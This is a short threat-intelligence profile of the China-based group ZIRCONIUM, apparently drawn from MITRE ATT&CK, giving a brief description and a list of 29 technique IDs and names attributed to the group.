Description
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)
Techniques Used (TTPs)
- T1082 — System Information Discovery (discovery)
- T1598 — Phishing for Information (reconnaissance)
- T1012 — Query Registry (discovery)
- T1665 — Hide Infrastructure (command-and-control)
- T1059.003 — Windows Command Shell (execution)
- T1583.006 — Web Services (resource-development)
- T1584.008 — Network Devices (resource-development)
- T1555.003 — Credentials from Web Browsers (credential-access)
- T1059.006 — Python (execution)
- T1547.001 — Registry Run Keys / Startup Folder (persistence, privilege-escalation)
- T1573.001 — Symmetric Cryptography (command-and-control)
- T1124 — System Time Discovery (discovery)
- T1140 — Deobfuscate/Decode Files or Information (defense-evasion)
- T1598.003 — Spearphishing Link (reconnaissance)
- T1566.002 — Spearphishing Link (initial-access)
- T1583.001 — Domains (resource-development)
- T1033 — System Owner/User Discovery (discovery)
- T1090.003 — Multi-hop Proxy (command-and-control)
- T1041 — Exfiltration Over C2 Channel (exfiltration)
- T1036 — Masquerading (defense-evasion)
- T1567.002 — Exfiltration to Cloud Storage (exfiltration)
- T1027.002 — Software Packing (defense-evasion)
- T1204.001 — Malicious Link (execution)
- T1036.004 — Masquerade Task or Service (defense-evasion)
- T1068 — Exploitation for Privilege Escalation (privilege-escalation)
- T1218.007 — Msiexec (defense-evasion)
- T1105 — Ingress Tool Transfer (command-and-control)
- T1016 — System Network Configuration Discovery (discovery)
- T1102.002 — Bidirectional Communication (command-and-control)
Total TTPs: 29